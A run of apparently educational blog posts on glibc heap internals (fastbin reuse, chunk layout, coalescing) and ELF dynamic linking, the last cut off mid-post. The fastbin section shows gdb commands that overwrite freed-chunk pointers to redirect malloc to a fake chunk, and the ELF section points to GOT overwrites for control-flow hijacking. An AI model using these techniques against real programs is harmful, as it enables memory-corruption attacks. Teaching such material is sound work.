The fastbins have a slightly different reallocation dance, they sit inside an Last In First Out (LIFO) queue when issued for reallocation. What this means is; if we were to free them one after the other in series; the first one returned for re-allocation; would be the last one free'd in the series.<br />
<br />
In the screenshot below; the memory dump on the left shows the state of the heap just before a malloc is called and <i>after</i> all the fastbin chunks have been free'd. On the right is the heap after the second malloc (<i>or reallocation</i>) has been called. So we should essentially see which fastbin chunks get returned and used and in which order (<i>mostly because I wrote some info into the heap chunks using the program - each allocation writes <span style="font-family: "courier new" , "courier" , monospace;">0xAA</span>, <span style="font-family: "courier new" , "courier" , monospace;">0xBB</span> into the heap in the order they are allocated in</i>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1clXxRYvqZ92iw0ccnZKgA6UYDu5crhgkx37tUWjyFJHO7d7npG3lZnH5VD1SgMWyPIyuLlAOdAqChXjm2pFgkKzjoYUhAsp6IK-gYQRuU7mr3XtVudcM95fIr1n5_LszvTL6A0FaKQ/s1600/LIFODemo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="573" data-original-width="1476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK1clXxRYvqZ92iw0ccnZKgA6UYDu5crhgkx37tUWjyFJHO7d7npG3lZnH5VD1SgMWyPIyuLlAOdAqChXjm2pFgkKzjoYUhAsp6IK-gYQRuU7mr3XtVudcM95fIr1n5_LszvTL6A0FaKQ/s1600/LIFODemo.png" /></a></div>
<br />
You should be able to pretty easily work out which chunks came back first. Also please keep in mind the pointers showing up on the free list; these <span style="font-family: "courier new" , "courier" , monospace;">0x602yyy</span> looking values in the heap chunks are the <span style="font-family: Courier New, Courier, monospace;">malloc_chunk->bk</span> pointers.<br />
<br />
The next question you will naturally ask is how do we make it returned a pointer we want, or how do we influence free chunks lets say, to force a certain free chunk to be returned? What happens when we overwrite this information "in flight" and then see which fastbin is returned? Well here's a recipe for testing this out:<br />
<ol style="text-align: left;">
<li>Free up some chunks</li>
<li>Re-point the <span style="font-family: Courier New, Courier, monospace;">malloc_chunk->bk</span> pointers of the fastbins</li>
<li>Check out which of the available chunks get <span style="font-family: Courier New, Courier, monospace;">0x4242 </span>written into them (<i>again this 0x4242/0x4141 stuff is purely because I'm making the program pain the heap helpfully for me</i>)</li>
</ol>
<div>
Lets see what this looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiby2evwXuPSTZzY03AVJxcqf6t1-qKEWW34FITX6Iy1QoOfUeN2rIDhwJ6yHu63ygCCYcHCaU5weIDjmnCdy-0zuEGMbodTK0Y1zrawO8GtJfMfGl3t_qkwZ4F2KoMofPEH_f27DZoN-I/s1600/redirection_fastbin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="667" data-original-width="691" height="617" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiby2evwXuPSTZzY03AVJxcqf6t1-qKEWW34FITX6Iy1QoOfUeN2rIDhwJ6yHu63ygCCYcHCaU5weIDjmnCdy-0zuEGMbodTK0Y1zrawO8GtJfMfGl3t_qkwZ4F2KoMofPEH_f27DZoN-I/s640/redirection_fastbin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
So just to explain. First I overwrite the <span style="font-family: Courier New, Courier, monospace;">bk </span>pointer with the <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x602100 = 0x0000000000602000</span> command; which essentially tells the heap that after the first fast bin is returned (<i>the first one in the LIFO at <span style="font-family: "courier new" , "courier" , monospace;">0x6020f0</span></i><span style="font-family: inherit;">) it should follow the linked list to the "next" free fastbin which is at </span><span style="font-family: "courier new" , "courier" , monospace;">0x0602000</span><span style="font-family: inherit;">. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The next screenshot shows how allocation was redirected; instead of allocating the next chunk just above the bottom most one, it jumps all the way to the top:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuwPeJ0JbVeZixCK0856vlOBATtMkXIpprSYX8nRX7WLLHtV2wc8bJpY2ewiZ-VnNQrzDmv_rTebbYI_HCASt_wg8PIAEoAa13RMIpNyhdpzXoxs5jvktO76Buy2HB7J-EqjY5MNgXjQs/s1600/redirected_fastbin_proof+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="579" data-original-width="769" height="481" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuwPeJ0JbVeZixCK0856vlOBATtMkXIpprSYX8nRX7WLLHtV2wc8bJpY2ewiZ-VnNQrzDmv_rTebbYI_HCASt_wg8PIAEoAa13RMIpNyhdpzXoxs5jvktO76Buy2HB7J-EqjY5MNgXjQs/s640/redirected_fastbin_proof+%25282%2529.png" width="640" /></a></div>
<br /></div>
One can clearly see, we just redirected the heap reallocation! The linked list powers belong to us now!!<br />
<br />
You can also redirect the heap to a fake chunk somewhere else in a writeable-readable portion of memory. To do this the following needs to be done:<br />
<ol style="text-align: left;">
<li>Free up all the fastbins</li>
<li>Just before the first re-alloc; Re-point the fastbin that's going to be first fitted to your fake fastbin like so for instance: <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x602100 = 0x601050 </span><span style="font-family: inherit;">(this sets the bk pointer of the chunk at </span><span style="font-family: Courier New, Courier, monospace;">0x6020f0</span><span style="font-family: inherit;">)</span></li>
<li>Set the size of the fast bin to something acceptable, here I'm just recycling the same size as the one being replaced, like this: <span style="font-family: "courier new" , "courier" , monospace;">set {size_t} 0x601058 = 0x0000000000000051</span></li>
</ol>
The below screenshot shows that this was achieved. We can see a weird heap chunk hanging out in the <span style="font-family: "courier new" , "courier" , monospace;">0x6010yy</span> address region while the rest of the chunks are at <span style="font-family: "courier new" , "courier" , monospace;">0x6020yy</span> range:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeXNYqFKuVxO0L0jMmFGGL2JaghyphenhyphenwNQH32SxuSlC5D_o2GHEDVUY39E5mVQxoylIL9VgRaj9IXVvi9UnF4G5k0lJQ36wfoySU3YdOsJALJ9XrDXSfp4qkxm2YcIVqxtvbSlcjm7URv80/s1600/chunk-redirection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="518" data-original-width="701" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeXNYqFKuVxO0L0jMmFGGL2JaghyphenhyphenwNQH32SxuSlC5D_o2GHEDVUY39E5mVQxoylIL9VgRaj9IXVvi9UnF4G5k0lJQ36wfoySU3YdOsJALJ9XrDXSfp4qkxm2YcIVqxtvbSlcjm7URv80/s1600/chunk-redirection.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
This is not a full on security exploit, but it definitely inches us closer to one. And it also introduces an important little trick for getting the heap to do reliably weird things lol.<br />
<br />
This is pretty much it for this post, I'll covering more heap meta-data in the next post. Stay tuned!<br />
<br />
<h2 style="text-align: left;">
References and Reading</h2>
<ol style="text-align: left;">
<li>Malloc.c <a href="https://fossies.org/linux/glibc/malloc/malloc.c">https://fossies.org/linux/glibc/malloc/malloc.c</a></li>
<li>"How2heap" - <a href="https://github.com/shellphish/how2heap">https://github.com/shellphish/how2heap</a> </li>
<li><a href="https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf">https://loccs.sjtu.edu.cn/wiki/lib/exe/fetch.php?media=gossip:overview:ptmalloc_camera.pdf</a> </li>
<li><a href="https://www.contextis.com/media/downloads/Glibc_Adventures__The_forgotten_chunks.pdf">https://www.contextis.com/media/downloads/Glibc_Adventures__The_forgotten_chunks.pdf</a> </li>
</ol>
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-8881237464434416792018-11-25T00:10:00.001-08:002018-12-06T22:13:25.520-08:00Glibc Heap Exploitation Basics : Introduction to ptmalloc2 internals (Part 1)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this post and the others in this series, I will unpack some of the internals to glibc's dynamic heap data structures and associated beasts. This post specifically will start you off with no background insight on the heap (perhaps a little on ELF internals and debugging), and detail some experiments you can perform to learn how the heap works.<br />
<br />
<h2 style="text-align: left;">
Introduction </h2>
<br />
The Heap is essentially a list of memory regions an executing program uses to store data. The data stored in heap regions are requested during runtime. It allows runtime environments like glibc to offer programs dynamic memory for allocating data. So because this offer's memory regions as kind of a "service" (<i>this is what it is for - giving out memory regions</i>), it must mean some where in this whole mess, there needs to be some accounting information about the memory regions. To this aid; the heap describes or decorates user data regions with an internal structure called a <span style="font-family: "courier new" , "courier" , monospace;">chunk</span>. Chunks are in turn classified and grouped according to their properties - basically properties like:<br />
<br />
<ul style="text-align: left;">
<li>whether they are available for use, </li>
<li>how big they are, </li>
<li>and which chunks are around them in the list and other wonderful things. </li>
</ul>
The big TL;DR for heap management is that its basic movement will essentially be to perform elaborate dances around the functions of searching through chunks either to free or allocate them.<br />
<br />
The heap allocator I will focus on here is glibc version ptmalloc as implemented in versions glibc 2.23-2.28. But this of course not to say that only glibc is important to understand; there exists multiple approaches to heap allocation. Each approach is unique down to how they achieve various operations; like coalescing free chunks, sorting and searching free chunks and grouping them rapidly, as well as amongst perhaps even more things - security improvements. So there's a number of places that complexity can breed and fester into security problems. But the root of these problems will often be in how users requesting data, and the allocator managing data respond to meta-data about memory regions.<br />
<i><br /></i>To close the introduction, Heap can often seem very intense and complex and have very gnarly internals, but most of which; aid memorization and other computer science that serves to speed up searching linked lists. Another way you can say this is that; they are nothing more than elaborate ways to store some "cheat" meta-data that doesn't require searching the whole heap memory area for stuff every time. But the meta-data is interesting to us because there are instances when we want to influence the way the list is searched and interpreted.<br />
<br />
<h2 style="text-align: left;">
Heap speak</h2>
The basic unit of currency for the heap as you would have guessed is a <span style="font-family: "courier new" , "courier" , monospace;">chunk</span>. We probably want to know what these look like in glibc code, so here ya go:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTMQa9xduLgu1U5y10UCuO4Gk412YTt7dAo62hujEmDjaNLsYXqt3umGUuWNDMtVApS6zVYdJYTJgSB6sA85yVh_spvcIYpjTOVyr57-DUVeRoopjrqKYsjvNVSk3XODPpwIyGc9idwY/s1600/Screenshot+from+2018-12-05+14-01-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="557" data-original-width="1155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisTMQa9xduLgu1U5y10UCuO4Gk412YTt7dAo62hujEmDjaNLsYXqt3umGUuWNDMtVApS6zVYdJYTJgSB6sA85yVh_spvcIYpjTOVyr57-DUVeRoopjrqKYsjvNVSk3XODPpwIyGc9idwY/s1600/Screenshot+from+2018-12-05+14-01-20.png" /></a></div>
<br />
I should give each field its fair explanation (<i>well as fair as I can be to it</i>):<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> - is something I should probably explain, this is a size type, for the fields that define "bookeeping" functions in the heap management - stuff like pointers (addresses) and bit fields. This size definition that is left to be implementation defined. We can imagine that glibc would want to be portable and flexible across different hardware's and runtime implementations - so address sizes mapped to <span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> can (but I don't think often do) vary. Anyway, the <span style="font-family: "courier new" , "courier" , monospace;">INTERNAL_SIZE_T</span> is defined to be <span style="font-family: "courier new" , "courier" , monospace;">size_t</span> - which falls back onto how ever your C runtime originally solved the problem. </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">mchunk_prev_size</span> - is the very first part of a chunk format and this is used whether its a free or used chunk. This field indicates the size of the chunk just before this one, and its least significant bit is set to <span style="font-family: "courier new" , "courier" , monospace;">0x1</span> if the chunk referred to, is free. So if you are looking at a chunk, and its prev_size has a least sig bit of <span style="font-family: "courier new" , "courier" , monospace;">0x1</span>, just before this is a chunk that is still "alive". </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">mchunk_size</span> - pretty standard, actually just holds the current size in bytes lol.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk* fd </span>- so this is a field in the chunk struct defining a space for an address to another chunk. This is because it forms a linked list. This linked list being defined here is the "free list", which snaps together all the chunks that are free on the heap. Here we are defining the "forward pointer" in the linked list.</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk *bk</span> - you guess it, this the same type as the previously mentioned field, we are here just talking about the "backward pointer". </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">struct malloc_chunk *fd_nextsize</span> - so this field is from another layer of free listing tech in the heap. This pointer is added to a free chunk if its above a certain size threshold (we will cover this later on) - so that the heap manager can track huge chunks should they appear. <i>Its kinda like being a high roller in a casino, when you come out they track your movements and wants even more intensely because you affect the profitability of the evening more</i>.</li>
</ul>
So we'd probably also want to get a look at what this looks like in execution, see what different kinds of chunks look like (<i>free vs allocated</i>) . We want to be able to understand the base language of the heap internals, before taking part in the conversation. So lets run a simple C program through gdb, and unpack the heap to show how it responds internally. The program I'm going to be looking at is the following:<br />
<script src="https://gist.github.com/k3170makan/20e0d09524c95afd89d04d87bf00ee04.js"></script>
<br />
<br />
<i>I know its a bit long winded you can totally skip over the other mallocs and free's if you don't want to go through each one. I added them here to give my examples and reversing some more interesting data</i>.<br />
<br />
In the code above I've added a simple make shift "wrapper" function (<i>my friend Galen gave me this idea</i>) and injected a break point just before the last return. This so that I can isolate the free and malloc calls effects on the memory regions we are studying.<br />
<br />
And now lets see what happens to the heap as it allocates memory. We need to find a pointer to the heap first. This is pretty easy since malloc will save it in rax after returning back to the main function, I show this in the first few gdb commands:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMz7frdm2LMLKwEQ-0wGxDqcjLktsdqaVuRhHZozBaeBItQ8Qmp5GLNxpZ6a9gvFxEfvXf5gAqyRA_pcY1H5isHAHZfetW7M_7JCquhQik3cr1uHItCByZwIQKhBZXqqYstPz4MEwCp5k/s1600/Screenshot+from+2018-12-02+13-12-45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="156" data-original-width="662" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMz7frdm2LMLKwEQ-0wGxDqcjLktsdqaVuRhHZozBaeBItQ8Qmp5GLNxpZ6a9gvFxEfvXf5gAqyRA_pcY1H5isHAHZfetW7M_7JCquhQik3cr1uHItCByZwIQKhBZXqqYstPz4MEwCp5k/s640/Screenshot+from+2018-12-02+13-12-45.png" width="640" /></a></div>
<br />
<br />
So as I have it set up the hook-stop will just spit out everything around $rax-0x10 which is the address where the chunk header information will be saved. I do this because; when we hit this break point malloc will have just returned at set the register to its return value - which will be the address of the memory region allocated. We can see directly how these macros operate on heap metadata data in <a href="https://github.com/lattera/glibc/blob/master/malloc/malloc.c">glibc/malloc/malloc.c</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHipK5OH0mace23EFyw8tqXZn-iD6k8COgasJukj-3YfKh92VERHJVDhQNcftOunnrA_NKr9sgFlT5gJkjYbQB6FMs0LnWMOclRIOLZLlNsTpLsKXT1OlrQSatUQ_yj8aHCbQx1bqS_ZY/s1600/Screenshot+from+2018-12-02+13-14-52.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="1006" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHipK5OH0mace23EFyw8tqXZn-iD6k8COgasJukj-3YfKh92VERHJVDhQNcftOunnrA_NKr9sgFlT5gJkjYbQB6FMs0LnWMOclRIOLZLlNsTpLsKXT1OlrQSatUQ_yj8aHCbQx1bqS_ZY/s1600/Screenshot+from+2018-12-02+13-14-52.png" /></a></div>
<br />
<br />
So as you can see its a simple addition or subtraction of 2 addresses to get the mem (<i>raw memory pointer to where user data starts</i>) or the chunk information starting two addresses before. There are a number of other operations that extract and set other meta-data.<br />
<br />
Okay so that's the basic format pretty much covered lets look at how this looks in action.<br />
<br />
<h2 style="text-align: left;">
Growing heap the natural way</h2>
After the first break point hits you should see gdb display the first heap chunk allocated, here's an annotated version of that dump showing the heap format:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkJeBv0MAEM_hEQk2q5vvVxA85s-gtv-ngCJDPFLMKlFgqhbon2ci7gCKm0wDK2SKB7b4cNdwqfHa1fTqRNa3NjvnPqQSFxhxKcX3Ta08eKm73YdRDItLnNqJnuZMjY4O7sr5jD5BD6o/s1600/allocated_chunk_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="1065" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkkJeBv0MAEM_hEQk2q5vvVxA85s-gtv-ngCJDPFLMKlFgqhbon2ci7gCKm0wDK2SKB7b4cNdwqfHa1fTqRNa3NjvnPqQSFxhxKcX3Ta08eKm73YdRDItLnNqJnuZMjY4O7sr5jD5BD6o/s1600/allocated_chunk_1.png" /></a></div>
<br />
<br />
Now after this hits your screen, try executing the "c" gdb command to skip to the next break point. You will get a couple more examples of allocated chunks until you see the following on your screen:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG23_3vXWRMbJSTZNhK2_HL9a1GcHGsVSkobq2Im1iddUzAnOAgV_4sDSmaPNg8Db29kml8XMgcqkKAzj8QyRL4oGm2876UsrQL5kobm955xMZm9zgouSSAyfE-UeDT-P7SFzGTlSmNo4/s1600/Screenshot+from+2018-12-05+19-48-01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="248" data-original-width="1172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgG23_3vXWRMbJSTZNhK2_HL9a1GcHGsVSkobq2Im1iddUzAnOAgV_4sDSmaPNg8Db29kml8XMgcqkKAzj8QyRL4oGm2876UsrQL5kobm955xMZm9zgouSSAyfE-UeDT-P7SFzGTlSmNo4/s1600/Screenshot+from+2018-12-05+19-48-01.png" /></a></div>
<br />
This is essentially showing that we can't use the value in <span style="font-family: Courier New, Courier, monospace;">$rax</span> as before in the hook-stop. As you would guess this is because <span style="font-family: Courier New, Courier, monospace;">$rax</span> does not hold the memory pointer anymore, its now embroiled in a free call so it hold some other value. Anyway, we can dump the chunk using the address passed to the <span style="font-family: Courier New, Courier, monospace;">free_string</span> function since it is conveniently displayed here for us. This is what the chunk looks like after it was free'd:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm4YJhRnQq_JjXdKZaaQuPJqzWuiScPpj2yvuxapBNCZl6SJXpedUSd7aqRoE7FNXvRUi1dYXEFoOCbzCA44P8aymH2Udnk-yzUK_tECrnJzjtJYClq-Qpa1H7jqS8LRgYeldKLKJSvA/s1600/free_chunk_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="525" data-original-width="1118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm4YJhRnQq_JjXdKZaaQuPJqzWuiScPpj2yvuxapBNCZl6SJXpedUSd7aqRoE7FNXvRUi1dYXEFoOCbzCA44P8aymH2Udnk-yzUK_tECrnJzjtJYClq-Qpa1H7jqS8LRgYeldKLKJSvA/s1600/free_chunk_1.png" /></a></div>
<br />
What is shown in the screen dump above in addition to the free chunk is where the first free chunks fd (<i>free list forward</i>) and bk (<i>free list backward</i>) pointers go. We can see here if we follow them using gdb's memory examiner functions they eventually end up at <span style="font-family: "courier new" , "courier" , monospace;">0x602a00</span> which is the top chunk's address; the pointer to the top of the currently allocated heap addresses.<br />
<br />
Okay so that's what a chunk looks like when its allocated and free'd, can we have a look at how chunks are coalesced into bigger free chunks? Yes that's what the next section is for!<br />
<br />
<h2 style="text-align: left;">
Free Chunk Coalescence</h2>
After allocating the chunks, our program will free up each one in the same order they were allocated in. Now what this means is that we can expect two chunks allocated next to each other; to be free'd right after each other as well - and as a result we will have two chunks that get melded into one.<br />
<br />
Here's what that looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguaVtk-6Xm3m2yqBwu73qv43jv0FrBPgf_HLgevxsCf7f8BMnzcIYMfabo-J3K7e5M-vTlPoXRnJXATlSXtRAYgqBLS4CTM40S3IeBH0Ew72oJbPlLlZ5kF-NkbOd1nFlr5bsc-bCtUsE/s1600/coalesce+chunk+%25282%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="627" data-original-width="1267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguaVtk-6Xm3m2yqBwu73qv43jv0FrBPgf_HLgevxsCf7f8BMnzcIYMfabo-J3K7e5M-vTlPoXRnJXATlSXtRAYgqBLS4CTM40S3IeBH0Ew72oJbPlLlZ5kF-NkbOd1nFlr5bsc-bCtUsE/s1600/coalesce+chunk+%25282%2529.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
What we can see on the left of the screen dump; is the two chunks (<i>named chunk 1, and chunk 2</i>) at addresses <span style="font-family: Courier New, Courier, monospace;">0x602580</span> and <span style="font-family: Courier New, Courier, monospace;">0x6024a0</span>. On the right we have the new coalesced chunk at <span style="font-family: Courier New, Courier, monospace;">0x6024a0</span> of course, but this time we can see that the size field after coalescing is <span style="font-family: Courier New, Courier, monospace;">0x211</span> (which as indicated is simply <span style="font-family: Courier New, Courier, monospace;">0xe1 + 0x130</span>).<br />
<br />
This is pretty much all there is to this coalescing action really. And thats pretty much all I have for this post, I'll continue this series by moving onto fast-bins, large chunk management and potentially some heap redirection tricks. Stay tuned for the next one folks!<br />
<br />
<h2 style="text-align: left;">
References and Reading</h2>
<div>
<i>Check out the following to see some inspiration for this post and more awesome things to find out about the heap works.</i><br />
<ol style="text-align: left;">
<li><a href="https://sourceware.org/glibc/wiki/MallocInternals%C2%A0">https://sourceware.org/glibc/wiki/MallocInternals </a></li>
<li><a href="http://phrack.org/issues/66/10.html">http://phrack.org/issues/66/10.html</a></li>
<li><a href="http://www.phrack.org/issues/68/13.html">http://www.phrack.org/issues/68/13.html</a></li>
<li>https://github.com/shellphish/how2heap </li>
<li><a href="https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf%C2%A0">https://www.blackhat.com/presentations/bh-usa-07/Ferguson/Whitepaper/bh-usa-07-ferguson-WP.pdf </a></li>
<li>2007 BlackHat Vegas V82 Ferguson Understanding the Heap 00 - <a href="https://www.youtube.com/watch?v=VLnhV1T5Ng4">https://www.youtube.com/watch?v=VLnhV1T5Ng4</a> </li>
<li>The Heap: what does malloc() do? - (bin 0x14) - <a href="https://www.youtube.com/watch?v=ZHghwsTRyzQ">https://www.youtube.com/watch?v=ZHghwsTRyzQ</a> </li>
<li><a href="ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps">ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps</a> </li>
<li><a href="https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf">https://www.cs.tufts.edu/~nr/cs257/archive/paul-wilson/fragmentation.pdf</a> </li>
<li><a href="https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf">https://www.blackhat.com/docs/eu-17/materials/eu-17-Heelan-Heap-Layout-Optimisation-For-Exploitation-wp.pdf</a> </li>
<li><a href="http://g.oswego.edu/dl/html/malloc.html">http://g.oswego.edu/dl/html/malloc.html</a></li>
<li><a href="https://fossies.org/linux/glibc/malloc/malloc.c">https://fossies.org/linux/glibc/malloc/malloc.c</a> </li>
</ol>
</div>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-25589007033507894022018-11-09T01:08:00.002-08:002018-11-09T20:54:49.284-08:00Introduction to the ELF Format (Part VII): Dynamic Linking / Loading and the .dynamic section<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<br />
This post is part of a series on the ELF format, if you haven't checked out the other parts of the series here they are:<br />
<ol style="text-align: left;">
<li>(Part I) : ELF Header <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-elf-header.html</a></li>
<li> (Part II) : Program Headers <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-format-part-ii.html </a></li>
<li>(Part III) : Section Header Table <a href="https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html">https://blog.k3170makan.com/2018/09/introduction-to-elf-file-format-part.html </a></li>
</ol>
<div>
<i>and many more!</i></div>
<div>
<br /></div>
So in this one I'm going to talk a little bit about how dynamic linking works. I'll unpack some useful things to know about how functions are executed when dynamic linking/loading is in effect.<br />
<h2 style="text-align: left;">
Overview of dynamic linking</h2>
As you would imagine; there are some ingredients to the dynamic linking magic, namely the procedure linkage table,the global offset table and the <span style="font-family: "courier new" , "courier" , monospace;">.dynamic</span> section. I'm going to layout some basic GOT and PLT theory, and then later on in the post I'll back up all this wonder full theory with some disassembled code and gdb screen dumps! So anyway, getting back into it...<br />
<br />
The Procedure Linkage Table (PLT) (<i>its actually more like a list of code stubs</i>) is a rough landing area for function calls to hit as a first stop in their dynamic linking journey. The PLT either branches directly to the function definition it needs <i>(by referencing the relevant entry in the Global Offset Table</i>) or sets up a call to the run time to sort it out (<i>along with some other parameters we will see later on!</i>). <i>A better name would be something like a "Procedure linkage function chain" because its actually just a contiguous region of code with a little run time invoking stub at its "head".</i><br />
<br />
The Global Offset Table (GOT) holds values that are meant to point directly to the intended definition - <i>its essentially the "final destination" of a function call</i>. As mentioned above this table is used as kind of a de-coupled reference table for the PLT. This is amazing for exploit deve-uh I mean compiler extension development; because it means if you can achieve simple address wide overwrites you can do a lot by targeting the GOT, in terms of possessing execution flow.<br />
<br />
The runtime's end goal is replacing the GOT entry for the called function with its correct value. The PLT entries that trigger when a function calls; preps some arguments the runtime needs to resolve the particular GOT entry. These arguments include the <span style="font-family: "courier new" , "courier" , monospace;">link_map</span> for the given object and its index in the dynamic symbol table.<br />
<br />
So we're going to look at how each of these data-structures work and show simply where you can replace values to subvert execution flow (depending on how you achieve the write of course).<br />
<br />
<h2 style="text-align: left;">
ELF Link Maps </h2>
<br />
As much as I wish this was literally a map of elf's named link, (breath of the wild reaccs only); link_maps are essentially small data structures that hold a couple pointers to some meta-data needed for completing some dynamic linking action. They are essentially shuffled around the internals of the runtime and dynamic linker; and other shared object handling things. link_map structs are passed directly to the function that invokes the dynamic linking action <span style="font-family: "courier new" , "courier" , monospace;">_dl_runtime_resolve_*</span> <i>(there are some caveats to this depending on os and arch I believe</i>). So they are actually more like little maps that link in the ELF symbol gods. Anyway here's what they look like:<br />
extract from elf/link.h:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcvGGf_zZSETWiijX0N_-ZYqmn08pwZNcZGQV1BMJC_CqYgvpv3gYL84H8Bo9RctGVn4h-Z2sc5XkkFFBQQ56Rztyz5Z0hjQoDuWe09fE76Jzd1aRfdguk43lGWiZ_yTvqYpdPMpOYHvg/s1600/Screenshot+from+2018-11-08+20-16-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="338" data-original-width="1170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcvGGf_zZSETWiijX0N_-ZYqmn08pwZNcZGQV1BMJC_CqYgvpv3gYL84H8Bo9RctGVn4h-Z2sc5XkkFFBQQ56Rztyz5Z0hjQoDuWe09fE76Jzd1aRfdguk43lGWiZ_yTvqYpdPMpOYHvg/s1600/Screenshot+from+2018-11-08+20-16-43.png" /></a></div>
<br />
<br />
The fields are pretty much documented well, as far as I can see they really do behave as described.<br />
We can though confirm some of these details through some light data collection and debugging. Here's a demonstration of how the<span style="font-family: "courier new" , "courier" , monospace;"> l_next</span> and <span style="font-family: "courier new" , "courier" , monospace;">l_prev</span> field's work:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
